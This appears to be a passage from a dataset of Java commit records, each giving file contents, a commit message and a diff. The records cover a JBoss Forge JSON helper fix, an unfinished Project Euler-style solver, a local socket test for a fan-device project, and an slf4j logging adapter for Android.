addOptional(metadataBuilder, "deprecatedMessage", metadata.getDeprecatedMessage()); builder.add("metadata", metadataBuilder); } @SuppressWarnings("unchecked") public void describeInputs(JsonObjectBuilder builder, CommandController controller) { // Add inputs JsonArrayBuilder inputBuilder = createArrayBuilder(); for (InputComponent<?, ?> input : controller.getInputs().values()) { JsonObjectBuilder objBuilder = createObjectBuilder() .add("name", input.getName()) .add("shortName", String.valueOf(input.getShortName())) .add("valueType", input.getValueType().getName()) .add("inputType", InputComponents.getInputType(input)) .add("enabled", input.isEnabled()) .add("required", input.isRequired()) .add("deprecated", input.isDeprecated()) .add("label", InputComponents.getLabelFor(input, false)); addOptional(objBuilder, "description", input.getDescription()); addOptional(objBuilder, "note", input.getNote()); Converter<Object, String> inputConverter = null; if (input instanceof SelectComponent) { SelectComponent<?, Object> selectComponent = (SelectComponent<?, Object>) input; inputConverter = InputComponents.getItemLabelConverter(converterFactory, selectComponent); JsonArrayBuilder valueChoices = createArrayBuilder(); for (Object valueChoice : selectComponent.getValueChoices()) { Object itemUnwrapped = Proxies.unwrap(valueChoice); String label = inputConverter.convert(itemUnwrapped); valueChoices.add(describeValueChoice(label, itemUnwrapped)); } objBuilder.add("valueChoices", valueChoices); if (input instanceof UISelectMany) { objBuilder.add("class", UISelectMany.class.getSimpleName()); } else { objBuilder.add("class", UISelectOne.class.getSimpleName()); } } else { if (input instanceof UIInputMany) { objBuilder.add("class", UIInputMany.class.getSimpleName()); } else { objBuilder.add("class", UIInput.class.getSimpleName()); } } if (inputConverter == null) { inputConverter = (Converter<Object, String>) converterFactory .getConverter(input.getValueType(), String.class); } if (input instanceof ManyValued) { ManyValued<?, Object> many = (ManyValued<?, Object>) input; JsonArrayBuilder manyValues = createArrayBuilder(); for (Object item : many.getValue()) { manyValues.add(inputConverter.convert(Proxies.unwrap(item))); } objBuilder.add("value", manyValues); } else { SingleValued<?, Object> single = (SingleValued<?, Object>) input; Object value = single.getValue(); if (value != null && !(value instanceof Number) && !(value instanceof Boolean)) { value = inputConverter.convert(Proxies.unwrap(value)); } addOptional(objBuilder, "value", value); } if (input instanceof HasCompleter) { HasCompleter<?, Object> hasCompleter = (HasCompleter<?, Object>) input; UICompleter<Object> completer = hasCompleter.getCompleter(); if (completer != null) { JsonArrayBuilder typeAheadData = createArrayBuilder(); Iterable<Object> valueChoices = completer.getCompletionProposals(controller.getContext(), (InputComponent<?, Object>) input, ""); for (Object valueChoice : valueChoices) { typeAheadData.add(inputConverter.convert(Proxies.unwrap(valueChoice))); } objBuilder.add("typeAheadData", typeAheadData); } } inputBuilder.add(objBuilder); } builder.add("inputs", inputBuilder); } public void describeValidation(JsonObjectBuilder builder, CommandController controller) { // Add messages JsonArrayBuilder messages = createArrayBuilder(); for (UIMessage message : controller.validate()) { JsonObjectBuilder messageObj = createObjectBuilder() .add("description", message.getDescription()) .add("severity", message.getSeverity().name()); if 
(message.getSource() != null) messageObj.add("input", message.getSource().getName()); messages.add(messageObj); } builder.add("messages", messages); } public void describeExecution(JsonObjectBuilder builder, CommandController controller) throws Exception { Result result = controller.execute(); describeResult(builder, result); // Get out and err RestUIProvider provider = (RestUIProvider) controller.getContext().getProvider(); builder.add("out", provider.getOut()); builder.add("err", provider.getErr()); } public void populateControllerAllInputs(JsonObject content, CommandController controller) throws Exception { populateController(content, controller); int stepIndex = content.getInt("stepIndex", 0); if (controller instanceof WizardCommandController) { WizardCommandController wizardController = (WizardCommandController) controller; for (int i = 0; i < stepIndex && wizardController.canMoveToNextStep(); i++) { wizardController.next().initialize(); populateController(content, wizardController); } } } public void populateController(JsonObject content, CommandController controller) { JsonArray inputArray = content.getJsonArray("inputs"); for (int i = 0; i < inputArray.size(); i++) { JsonObject input = inputArray.getJsonObject(i); String inputName = input.getString("name"); JsonValue valueObj = input.get("value"); Object inputValue = null; if (valueObj != null) { switch (valueObj.getValueType()) { case ARRAY: ArrayList<String> list = new ArrayList<>(); for (JsonValue value : (JsonArray) valueObj) { if (value.getValueType() == ValueType.STRING) { list.add(((JsonString) value).getString()); } } inputValue = list; break; case FALSE: inputValue = false; break; case TRUE: inputValue = true; break; case NUMBER: inputValue = ((JsonNumber) valueObj).intValue(); break; case STRING: inputValue = ((JsonString) valueObj).getString(); break; default: break; } } if (controller.hasInput(inputName) && inputValue != null) controller.setValueFor(inputName, inputValue); } } public void describeResult(JsonObjectBuilder builder, Result result) { JsonArrayBuilder array = createArrayBuilder(); collectResults(array, result); builder.add("results", array); } protected void collectResults(JsonArrayBuilder results, Result result) { if (result instanceof CompositeResult) { for (Result r : ((CompositeResult) result).getResults()) { collectResults(results, r); } } else { results.add(describeSingleResult(result)); } } protected JsonObjectBuilder describeValueChoice(String label, Object obj) { JsonObjectBuilder builder = createObjectBuilder(); builder.add("id", label); if (!(obj instanceof String) && !(obj instanceof Number) && !(obj instanceof Boolean)) { try { BeanInfo beanInfo = Introspector.getBeanInfo(obj.getClass()); for (PropertyDescriptor pd : beanInfo.getPropertyDescriptors()) { // Ignore class attribute from Object.class String name = pd.getName(); if ("class".equals(name)) { continue; } Method readMethod = pd.getReadMethod(); if (readMethod != null) { try { addOptional(builder, name, readMethod.invoke(obj)); } catch (Exception e) { // Ignore // e.printStackTrace(); } } } } catch (IntrospectionException ie) { // ignore // ie.printStackTrace(); } } return builder; } protected JsonObjectBuilder describeSingleResult(Result result) { JsonObjectBuilder builder = createObjectBuilder(); builder.add("status", (result instanceof Failed) ? 
"FAILED" : "SUCCESS"); if (result != null) addOptional(builder, "message", result.getMessage()); return builder; } protected void addOptional(JsonObjectBuilder builder, String name, Object value) { if (value != null) { if (value instanceof Boolean) { builder.add(name, (Boolean) value); } else if (value instanceof Number) { builder.add(name, ((Number) value).intValue()); } else { builder.add(name, value.toString()); } } } }
Do not override Id
core/src/main/java/org/jboss/forge/service/util/UICommandHelper.java
Do not override Id
<ide><path>core/src/main/java/org/jboss/forge/service/util/UICommandHelper.java <ide> BeanInfo beanInfo = Introspector.getBeanInfo(obj.getClass()); <ide> for (PropertyDescriptor pd : beanInfo.getPropertyDescriptors()) <ide> { <del> // Ignore class attribute from Object.class <add> // Ignore class attribute from Object.class and do not override id <ide> String name = pd.getName(); <del> if ("class".equals(name)) <add> if ("id".equals(name) || "class".equals(name)) <ide> { <ide> continue; <ide> }
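A brief note on the "Do not override Id" change captured above: the value-choice describer first writes the converted label under the key "id" and then copies every readable bean property into the same JsonObjectBuilder; because javax.json replaces the value when the same key is added twice, a bean exposing its own getId() would silently clobber the label, so the diff skips the "id" property alongside "class". The following is only a minimal, self-contained sketch of that filtering idea, not the Forge source; the class name ValueChoiceSketch and its method are invented for illustration.

import java.beans.BeanInfo;
import java.beans.Introspector;
import java.beans.PropertyDescriptor;
import java.lang.reflect.Method;
import javax.json.Json;
import javax.json.JsonObjectBuilder;

public class ValueChoiceSketch {
    // Builds {"id": label, prop1: value1, ...} for an arbitrary bean, skipping
    // "class" (inherited from Object) and "id" so the bean cannot override the label.
    static JsonObjectBuilder describeValueChoice(String label, Object bean) throws Exception {
        JsonObjectBuilder builder = Json.createObjectBuilder();
        builder.add("id", label);
        BeanInfo beanInfo = Introspector.getBeanInfo(bean.getClass());
        for (PropertyDescriptor pd : beanInfo.getPropertyDescriptors()) {
            String name = pd.getName();
            if ("id".equals(name) || "class".equals(name)) {
                continue; // never let a bean property overwrite the label-based id
            }
            Method readMethod = pd.getReadMethod();
            if (readMethod != null) {
                Object value = readMethod.invoke(bean);
                if (value != null) {
                    builder.add(name, value.toString());
                }
            }
        }
        return builder;
    }
}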
Java
mit
8b6fd8a836d7be9d36bb2485afbfaabb866f5818
0
Fantast/project-euler,Fantast/project-euler,Fantast/project-euler,Fantast/project-euler,Fantast/project-euler,Fantast/project-euler
package opener15; import tasks.AbstractTask; import tasks.Tester; import utils.log.Logger; import utils.pairs.IntPair; import utils.triples.IntTriple; import java.util.*; //Answer : public class Task_34_3 extends AbstractTask { public static void main(String[] args) { Logger.init("default.log"); Tester.test(new Task_34_3()); Logger.close(); } int primes[][] = new int[][]{ new int[]{2, 3, 4}, new int[]{2, 4, 4}, new int[]{2, 4, 5}, new int[]{6, 6, 6}, new int[]{2, 6, 10} }; boolean can[][][] = new boolean[100][100][100]; List<IntTriple> tmp = new ArrayList<>(); List<IntTriple> news = new ArrayList<>(); List<IntTriple> news2 = new ArrayList<>(); int tmpindex[][][] = new int[100][100][100]; int index1[][][] = new int[100][100][100]; int index2[][][] = new int[100][100][100]; int index_n1[][] = new int[100][100]; int index_n2[][] = new int[100][100]; public void solving() { for (int[] p : primes) { put(p[0], p[1], p[2]); } while (news.size() != 0) { System.out.println("News: " + news.size()); news2.clear(); for (IntTriple tn : news) { // multiply(tn); combine(tn); } } long res = 0; for (int a = 1; a < 100; a++) { for (int b = a; b < 100; b++) { for (int c = b; c < 100; c++) { if (can[a][b][c]) { res += Long.parseLong("" + a + b + c); } } } } System.out.println(res); } private void multiply(IntTriple tn) { for (int a = tn.a; a < 100; a += tn.a) { for (int b = closest(a, tn.b); b < 100; b += tn.b) { for (int c = closest(b, tn.c); c < 100; c += tn.c) { if (!can[a][b][c]) { put(a,b,c); } } } } } private void put(int a, int b, int c) { indexx(a, b, c); indexx(a, c, b); indexx(b, a, c); indexx(b, c, a); indexx(c, a, b); indexx(c, b, a); news2.add(sortedTriple(a, b, c)); } private void indexx(int a, int b, int c) { can[a][b][c] = true; index2[a][b][index_n2[a][b]++] = c; } private int closest(int a, int b) { if (a%b == 0) { return a; } return (a/b+1)*b; } void combine(IntTriple t) { putnew(t.a, t.b, t.c, index1.get(MnMxPair(t.a, t.b))); putnew(t.a, t.c, t.b, index1.get(MnMxPair(t.a, t.c))); putnew(t.b, t.c, t.a, index1.get(MnMxPair(t.b, t.c))); } void putnew(int a, int b, int c1, List<Integer> cc) { int indexLen = index_n1[a][b]; for (int i = 0; i < indexLen; ++i) { int c2 = index1[a][b][i]; for (int c = c1; c < 100; c += c2) { if (!can[a][b][c]) { put(a, b, c); } } for (int c = c2; c < 100; c += c1) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } } } void combine(IntTriple t1, IntTriple t2) { putnew(t1.a, t1.b, t1.c, t2.a, t2.b, t2.c); putnew(t1.a, t1.c, t1.b, t2.a, t2.c, t2.b); putnew(t1.b, t1.a, t1.c, t2.b, t2.a, t2.c); putnew(t1.b, t1.c, t1.a, t2.b, t2.c, t2.a); putnew(t1.c, t1.a, t1.b, t2.c, t2.a, t2.b); putnew(t1.c, t1.b, t1.a, t2.c, t2.b, t2.a); } private void putnew(int a1, int b1, int c1, int a2, int b2, int c2) { if (a1 == a2 && b1 == b2) { putnew(a1, b1, c1, c2); } } int sr[] = new int[3]; private void putnew(int a, int b, int c1, int c2) { for (int c = c1; c < 100; c += c2) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } for (int c = c2; c < 100; c += c1) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } } int st[] = new int[3]; IntTriple sortedTriple(int a, int b, int c) { st[0] = a; st[1] 
= b; st[2] = c; Arrays.sort(st); return new IntTriple(st[0], st[1], st[2]); } static IntPair MnMxPair(int a, int b) { return new IntPair(Math.min(a, b), Math.max(a, b)); } }
src/main/opener2015/opener15/Task_34_3.java
package opener15; import tasks.AbstractTask; import tasks.Tester; import utils.log.Logger; import utils.triples.IntTriple; import java.util.ArrayList; import java.util.Arrays; import java.util.List; //Answer : public class Task_34_3 extends AbstractTask { public static void main(String[] args) { Logger.init("default.log"); Tester.test(new Task_34_3()); Logger.close(); } int basic[][] = new int[][]{ new int[]{2, 3, 4}, new int[]{2, 4, 4}, new int[]{2, 4, 5}, new int[]{6, 6, 6}, new int[]{2, 6, 10} }; int primes[][] = new int[30][3]; boolean can[][][] = new boolean[100][100][100]; List<IntTriple> olds = new ArrayList<>(); List<IntTriple> tmp = new ArrayList<>(); List<IntTriple> news = new ArrayList<>(); List<IntTriple> news2 = new ArrayList<>(); public void solving() { // createPrimes(); primes = basic; for (int[] p : primes) { olds.add(new IntTriple(p[0], p[1], p[2])); } news = new ArrayList<>(olds); while (news.size() != 0) { System.out.println("News: " + news.size() + "; Olds: " + olds.size()); news2.clear(); for (IntTriple to : olds) { for (IntTriple tn : news) { combine(to, tn); } } olds.addAll(news2); tmp = news; news = news2; news2 = tmp; } long res = 0; for(IntTriple t : olds) { res += Long.parseLong("" + t.a + t.b + t.c); } System.out.println(res); } void combine(IntTriple t1, IntTriple t2) { putnew(t1.a, t1.b, t1.c, t2.a, t2.b, t2.c); putnew(t1.a, t1.c, t1.b, t2.a, t2.c, t2.b); putnew(t1.b, t1.a, t1.c, t2.b, t2.a, t2.c); putnew(t1.b, t1.c, t1.a, t2.b, t2.c, t2.a); putnew(t1.c, t1.a, t1.b, t2.c, t2.a, t2.b); putnew(t1.c, t1.b, t1.a, t2.c, t2.b, t2.a); } private void putnew(int a1, int b1, int c1, int a2, int b2, int c2) { if (a1 == a2 && b1 == b2) { putnew(a1, b1, c1, c2); } } int sr[] = new int[3]; private void putnew(int a, int b, int c1, int c2) { for (int c = c1; c < 100; c += c2) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } for (int c = c2; c < 100; c += c1) { sr[0] = a; sr[1] = b; sr[2] = c; Arrays.sort(sr); if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { can[sr[0]][sr[1]][sr[2]] = true; news2.add(new IntTriple(sr[0], sr[1], sr[2])); } } } }
opener 2015
src/main/opener2015/opener15/Task_34_3.java
opener 2015
<ide><path>rc/main/opener2015/opener15/Task_34_3.java <ide> import tasks.AbstractTask; <ide> import tasks.Tester; <ide> import utils.log.Logger; <add>import utils.pairs.IntPair; <ide> import utils.triples.IntTriple; <ide> <del>import java.util.ArrayList; <del>import java.util.Arrays; <del>import java.util.List; <add>import java.util.*; <ide> <ide> //Answer : <ide> public class Task_34_3 extends AbstractTask { <ide> Logger.close(); <ide> } <ide> <del> int basic[][] = new int[][]{ <add> int primes[][] = new int[][]{ <ide> new int[]{2, 3, 4}, <ide> new int[]{2, 4, 4}, <ide> new int[]{2, 4, 5}, <ide> new int[]{6, 6, 6}, <ide> new int[]{2, 6, 10} <ide> }; <del> int primes[][] = new int[30][3]; <ide> boolean can[][][] = new boolean[100][100][100]; <ide> <del> List<IntTriple> olds = new ArrayList<>(); <ide> List<IntTriple> tmp = new ArrayList<>(); <ide> List<IntTriple> news = new ArrayList<>(); <ide> List<IntTriple> news2 = new ArrayList<>(); <ide> <add> int tmpindex[][][] = new int[100][100][100]; <add> int index1[][][] = new int[100][100][100]; <add> int index2[][][] = new int[100][100][100]; <add> <add> int index_n1[][] = new int[100][100]; <add> int index_n2[][] = new int[100][100]; <add> <ide> public void solving() { <del>// createPrimes(); <del> primes = basic; <ide> for (int[] p : primes) { <del> olds.add(new IntTriple(p[0], p[1], p[2])); <add> put(p[0], p[1], p[2]); <ide> } <del> news = new ArrayList<>(olds); <ide> <ide> while (news.size() != 0) { <del> System.out.println("News: " + news.size() + "; Olds: " + olds.size()); <add> System.out.println("News: " + news.size()); <ide> news2.clear(); <del> for (IntTriple to : olds) { <del> for (IntTriple tn : news) { <del> combine(to, tn); <del> } <add> <add> for (IntTriple tn : news) { <add>// multiply(tn); <add> combine(tn); <ide> } <del> olds.addAll(news2); <del> tmp = news; <del> news = news2; <del> news2 = tmp; <ide> } <ide> <ide> long res = 0; <del> for(IntTriple t : olds) { <del> res += Long.parseLong("" + t.a + t.b + t.c); <add> for (int a = 1; a < 100; a++) { <add> for (int b = a; b < 100; b++) { <add> for (int c = b; c < 100; c++) { <add> if (can[a][b][c]) { <add> res += Long.parseLong("" + a + b + c); <add> } <add> } <add> } <ide> } <ide> System.out.println(res); <add> } <add> <add> private void multiply(IntTriple tn) { <add> for (int a = tn.a; a < 100; a += tn.a) { <add> for (int b = closest(a, tn.b); b < 100; b += tn.b) { <add> for (int c = closest(b, tn.c); c < 100; c += tn.c) { <add> if (!can[a][b][c]) { <add> put(a,b,c); <add> } <add> } <add> } <add> } <add> } <add> <add> private void put(int a, int b, int c) { <add> indexx(a, b, c); <add> indexx(a, c, b); <add> indexx(b, a, c); <add> indexx(b, c, a); <add> indexx(c, a, b); <add> indexx(c, b, a); <add> news2.add(sortedTriple(a, b, c)); <add> } <add> <add> private void indexx(int a, int b, int c) { <add> can[a][b][c] = true; <add> index2[a][b][index_n2[a][b]++] = c; <add> } <add> <add> private int closest(int a, int b) { <add> if (a%b == 0) { <add> return a; <add> } <add> return (a/b+1)*b; <add> } <add> <add> void combine(IntTriple t) { <add> putnew(t.a, t.b, t.c, index1.get(MnMxPair(t.a, t.b))); <add> putnew(t.a, t.c, t.b, index1.get(MnMxPair(t.a, t.c))); <add> putnew(t.b, t.c, t.a, index1.get(MnMxPair(t.b, t.c))); <add> } <add> <add> void putnew(int a, int b, int c1, List<Integer> cc) { <add> int indexLen = index_n1[a][b]; <add> for (int i = 0; i < indexLen; ++i) { <add> int c2 = index1[a][b][i]; <add> <add> for (int c = c1; c < 100; c += c2) { <add> if (!can[a][b][c]) { <add> 
put(a, b, c); <add> } <add> } <add> for (int c = c2; c < 100; c += c1) { <add> sr[0] = a; <add> sr[1] = b; <add> sr[2] = c; <add> Arrays.sort(sr); <add> <add> if (sr[2] < 100 && !can[sr[0]][sr[1]][sr[2]]) { <add> can[sr[0]][sr[1]][sr[2]] = true; <add> news2.add(new IntTriple(sr[0], sr[1], sr[2])); <add> } <add> } <add> } <ide> } <ide> <ide> void combine(IntTriple t1, IntTriple t2) { <ide> } <ide> } <ide> } <add> <add> int st[] = new int[3]; <add> IntTriple sortedTriple(int a, int b, int c) { <add> st[0] = a; <add> st[1] = b; <add> st[2] = c; <add> Arrays.sort(st); <add> return new IntTriple(st[0], st[1], st[2]); <add> } <add> <add> static IntPair MnMxPair(int a, int b) { <add> return new IntPair(Math.min(a, b), Math.max(a, b)); <add> } <ide> }
Java
mit
7abec165f1ac1b587de3af84729b1e0961d9f610
0
marcoFuschini/ISLT2013gruppo14
package it.unibo.IngSW.Tests.FanDevice; import static org.junit.Assert.*; import it.unibo.IngSW.ControlUnit.ControlUnitCommunicator; import it.unibo.IngSW.FanDevice.FanDeviceCommunicator; import it.unibo.IngSW.Viewer.ViewerCommunicator; import it.unibo.IngSW.common.SensorData; import it.unibo.IngSW.common.interfaces.ISensorData; import it.unibo.IngSW.utils.JSONConverter; import org.junit.Assert; import org.junit.Test; public class ServerComunicatorTest { private static final int CUPORT=10001; private static final int VPORT=10002; private FanDeviceCommunicator fdcomm=new FanDeviceCommunicator(); private ViewerCommunicator vcomm1=new ViewerCommunicator(); private ViewerCommunicator vcomm2=new ViewerCommunicator(); private ControlUnitCommunicator ccomm=new ControlUnitCommunicator(); private void scrivi(String s){ System.out.println(s); } @Test public void test() { Thread t = new Thread(new Runnable() { @Override public void run() { try { fdcomm.connect(VPORT, CUPORT); String s=fdcomm.receiveCommand(); scrivi(s); fdcomm.sendData(new ISensorData[]{new SensorData("nome1", "val1")}); ok(); fdcomm.sendData(new ISensorData[]{new SensorData("nome1", "val1")}); fdcomm.disconnect(); } catch (Exception e) { e.printStackTrace(); return; } } }); t.start(); try { ccomm.connect("127.0.0.1", CUPORT); vcomm1.connect("127.0.0.1", VPORT); vcomm2.connect("127.0.0.1", VPORT); ccomm.sendCommand(JSONConverter.commandToJSON("START")); ISensorData[] data1=vcomm1.receiveData(); ISensorData[] data2=vcomm2.receiveData(); assertTrue(data1.equals(data2)); ccomm.disconnect(); vcomm1.disconnect(); vcomm2.disconnect(); } catch (Exception e) { e.printStackTrace(); } } private void ok() { System.out.println("ok"); } }
FanDeviceSystemTESTS/src/it/unibo/IngSW/Tests/FanDevice/ServerComunicatorTest.java
package it.unibo.IngSW.Tests.FanDevice; import static org.junit.Assert.*; import it.unibo.IngSW.ControlUnit.ControlUnitCommunicator; import it.unibo.IngSW.FanDevice.FanDeviceCommunicator; import it.unibo.IngSW.Viewer.ViewerCommunicator; import it.unibo.IngSW.common.interfaces.ISensorData; import it.unibo.IngSW.utils.JSONConverter; import org.junit.Assert; import org.junit.Test; public class ServerComunicatorTest { private static final int CUPORT=10001; private static final int VPORT=10002; private FanDeviceCommunicator fdcomm=new FanDeviceCommunicator(); private ViewerCommunicator vcomm1=new ViewerCommunicator(); private ViewerCommunicator vcomm2=new ViewerCommunicator(); private ControlUnitCommunicator ccomm=new ControlUnitCommunicator(); private void scrivi(String s){ System.out.println(s); } @Test public void test() { Thread t = new Thread(new Runnable() { @Override public void run() { try { fdcomm.connect(VPORT, CUPORT); String s=fdcomm.receiveCommand(); scrivi(s); fdcomm.disconnect(); } catch (Exception e) { e.printStackTrace(); return; } } }); t.start(); try { ccomm.connect("127.0.0.1", CUPORT); vcomm1.connect("127.0.0.1", VPORT); vcomm2.connect("127.0.0.1", VPORT); ccomm.sendCommand(JSONConverter.commandToJSON("START")); ISensorData[] data1=vcomm1.receiveData(); ISensorData[] data2=vcomm2.receiveData(); assertTrue(data1.equals(data2)); ccomm.disconnect(); vcomm1.disconnect(); vcomm2.disconnect(); } catch (Exception e) { e.printStackTrace(); } } }
Signed-off-by: Marco <Marco@MarcoFisso>
FanDeviceSystemTESTS/src/it/unibo/IngSW/Tests/FanDevice/ServerComunicatorTest.java
<ide><path>FanDeviceSystemTESTS/src/it/unibo/IngSW/Tests/FanDevice/ServerComunicatorTest.java <ide> import it.unibo.IngSW.ControlUnit.ControlUnitCommunicator; <ide> import it.unibo.IngSW.FanDevice.FanDeviceCommunicator; <ide> import it.unibo.IngSW.Viewer.ViewerCommunicator; <add>import it.unibo.IngSW.common.SensorData; <ide> import it.unibo.IngSW.common.interfaces.ISensorData; <ide> import it.unibo.IngSW.utils.JSONConverter; <ide> <ide> fdcomm.connect(VPORT, CUPORT); <ide> String s=fdcomm.receiveCommand(); <ide> scrivi(s); <add> fdcomm.sendData(new ISensorData[]{new SensorData("nome1", "val1")}); <add> ok(); <add> fdcomm.sendData(new ISensorData[]{new SensorData("nome1", "val1")}); <ide> <ide> fdcomm.disconnect(); <ide> } catch (Exception e) { <ide> e.printStackTrace(); <ide> } <ide> <ide> } <add> <add> private void ok() { <add> System.out.println("ok"); <add> } <ide> <ide> <ide> }
Java
mit
5d6f743bb02c78614fb9e2d9513980700f0cd869
0
fighter0ik/slf4j-android
package com.fighter0ik.slf4jandroid; import org.slf4j.helpers.MarkerIgnoringBase; import java.util.logging.Level; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * Created by DS on 24.05.2016. */ public class Logger extends MarkerIgnoringBase { private final java.util.logging.Logger mLogger; // Logger( java.util.logging.Logger logger ) { mLogger = logger; } // @Override public String getName() { return mLogger.getName(); } @Override public boolean isTraceEnabled() { return mLogger.isLoggable( Level.FINEST ); } @Override public void trace( String s ) { log( Level.FINEST, "{}", new Object[]{s}, null ); } @Override public void trace( String s, Object o ) { log( Level.FINEST, s, new Object[]{o}, null ); } @Override public void trace( String s, Object o1, Object o2 ) { log( Level.FINEST, s, new Object[]{o1,o2}, null ); } @Override public void trace( String s, Object... objects ) { log( Level.FINEST, s, objects, null ); } @Override public void trace( String s, Throwable t ) { log( Level.FINEST, "{}", new Object[]{s}, t ); } @Override public boolean isDebugEnabled() { return mLogger.isLoggable( Level.FINE ) || mLogger.isLoggable( Level.FINER ); } @Override public void debug( String s ) { log( Level.FINE, "{}", new Object[]{s}, null ); } @Override public void debug( String s, Object o ) { log( Level.FINE, s, new Object[]{o}, null ); } @Override public void debug( String s, Object o1, Object o2 ) { log( Level.FINE, s, new Object[]{o1,o2}, null ); } @Override public void debug( String s, Object... objects ) { log( Level.FINE, s, objects, null ); } @Override public void debug( String s, Throwable t ) { log( Level.FINE, "{}", new Object[]{s}, t ); } @Override public boolean isInfoEnabled() { return mLogger.isLoggable( Level.INFO ) || mLogger.isLoggable( Level.CONFIG ); } @Override public void info( String s ) { log( Level.INFO, "{}", new Object[]{s}, null ); } @Override public void info( String s, Object o ) { log( Level.INFO, s, new Object[]{o}, null ); } @Override public void info( String s, Object o1, Object o2 ) { log( Level.INFO, s, new Object[]{o1,o2}, null ); } @Override public void info( String s, Object... objects ) { log( Level.INFO, s, objects, null ); } @Override public void info( String s, Throwable t ) { log( Level.INFO, "{}", new Object[]{s}, t ); } @Override public boolean isWarnEnabled() { return mLogger.isLoggable( Level.WARNING ); } @Override public void warn( String s ) { log( Level.WARNING, "{}", new Object[]{s}, null ); } @Override public void warn( String s, Object o ) { log( Level.WARNING, s, new Object[]{o}, null ); } @Override public void warn( String s, Object o1, Object o2 ) { log( Level.WARNING, s, new Object[]{o1,o2}, null ); } @Override public void warn( String s, Object... objects ) { log( Level.WARNING, s, objects, null ); } @Override public void warn( String s, Throwable t ) { log( Level.WARNING, "{}", new Object[]{s}, t ); } @Override public boolean isErrorEnabled() { return mLogger.isLoggable( Level.SEVERE ); } @Override public void error( String s ) { log( Level.SEVERE, "{}", new Object[]{s}, null ); } @Override public void error( String s, Object o ) { log( Level.SEVERE, s, new Object[]{o}, null ); } @Override public void error( String s, Object o1, Object o2 ) { log( Level.SEVERE, s, new Object[]{o1,o2}, null ); } @Override public void error( String s, Object... 
objects ) { log( Level.SEVERE, s, objects, null ); } @Override public void error( String s, Throwable t ) { log( Level.SEVERE, "{}", new Object[]{s}, t ); } // private void log( Level level, String format, Object[] objects, Throwable throwable ) { if ( !mLogger.isLoggable( level ) ) return; LogRecord record = new LogRecord( level, slf4jFormatToJulFormat( format ) ); record.setLoggerName( mLogger.getName() ); record.setParameters( objects ); record.setThrown( throwable ); setLogRecordSource( record ); mLogger.log( record ); } // private String slf4jFormatToJulFormat( String format ) { int i = 0; StringBuffer buffer = new StringBuffer(); Pattern pattern = Pattern.compile( "\\{\\s*\\}" ); Matcher matcher = pattern.matcher( format ); while ( matcher.find() ) matcher.appendReplacement( buffer, ("{"+(i++)+"}") ); matcher.appendTail( buffer ); return buffer.toString(); } private void setLogRecordSource( LogRecord record ) { String thisClassName = getClass().getName(); boolean thisClassFound = false; new Throwable().printStackTrace(); StackTraceElement[] elements = new Throwable().getStackTrace(); for ( StackTraceElement element : elements ) { if ( element.getClassName().startsWith( thisClassName ) ) { System.err.println( "FOUND: "+element.toString() ); thisClassFound = true; } else if ( thisClassFound ) { System.err.println( element.toString() ); record.setSourceClassName( element.getClassName() ); record.setSourceMethodName( element.getMethodName() ); break; } } } }
lib/src/main/java/com/fighter0ik/slf4jandroid/Logger.java
package com.fighter0ik.slf4jandroid; import org.slf4j.helpers.MarkerIgnoringBase; import java.util.logging.Level; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * Created by DS on 24.05.2016. */ public class Logger extends MarkerIgnoringBase { private final java.util.logging.Logger mLogger; // Logger( java.util.logging.Logger logger ) { mLogger = logger; } // @Override public String getName() { return mLogger.getName(); } @Override public boolean isTraceEnabled() { return mLogger.isLoggable( Level.FINEST ); } @Override public void trace( String s ) { log( Level.FINEST, "{}", new Object[]{s}, null ); } @Override public void trace( String s, Object o ) { log( Level.FINEST, s, new Object[]{o}, null ); } @Override public void trace( String s, Object o1, Object o2 ) { log( Level.FINEST, s, new Object[]{o1,o2}, null ); } @Override public void trace( String s, Object... objects ) { log( Level.FINEST, s, objects, null ); } @Override public void trace( String s, Throwable t ) { log( Level.FINEST, "{}", new Object[]{s}, t ); } @Override public boolean isDebugEnabled() { return mLogger.isLoggable( Level.FINE ) || mLogger.isLoggable( Level.FINER ); } @Override public void debug( String s ) { log( Level.FINE, "{}", new Object[]{s}, null ); } @Override public void debug( String s, Object o ) { log( Level.FINE, s, new Object[]{o}, null ); } @Override public void debug( String s, Object o1, Object o2 ) { log( Level.FINE, s, new Object[]{o1,o2}, null ); } @Override public void debug( String s, Object... objects ) { log( Level.FINE, s, objects, null ); } @Override public void debug( String s, Throwable t ) { log( Level.FINE, "{}", new Object[]{s}, t ); } @Override public boolean isInfoEnabled() { return mLogger.isLoggable( Level.INFO ) || mLogger.isLoggable( Level.CONFIG ); } @Override public void info( String s ) { log( Level.INFO, "{}", new Object[]{s}, null ); } @Override public void info( String s, Object o ) { log( Level.INFO, s, new Object[]{o}, null ); } @Override public void info( String s, Object o1, Object o2 ) { log( Level.INFO, s, new Object[]{o1,o2}, null ); } @Override public void info( String s, Object... objects ) { log( Level.INFO, s, objects, null ); } @Override public void info( String s, Throwable t ) { log( Level.INFO, "{}", new Object[]{s}, t ); } @Override public boolean isWarnEnabled() { return mLogger.isLoggable( Level.WARNING ); } @Override public void warn( String s ) { log( Level.WARNING, "{}", new Object[]{s}, null ); } @Override public void warn( String s, Object o ) { log( Level.WARNING, s, new Object[]{o}, null ); } @Override public void warn( String s, Object o1, Object o2 ) { log( Level.WARNING, s, new Object[]{o1,o2}, null ); } @Override public void warn( String s, Object... objects ) { log( Level.WARNING, s, objects, null ); } @Override public void warn( String s, Throwable t ) { log( Level.WARNING, "{}", new Object[]{s}, t ); } @Override public boolean isErrorEnabled() { return mLogger.isLoggable( Level.SEVERE ); } @Override public void 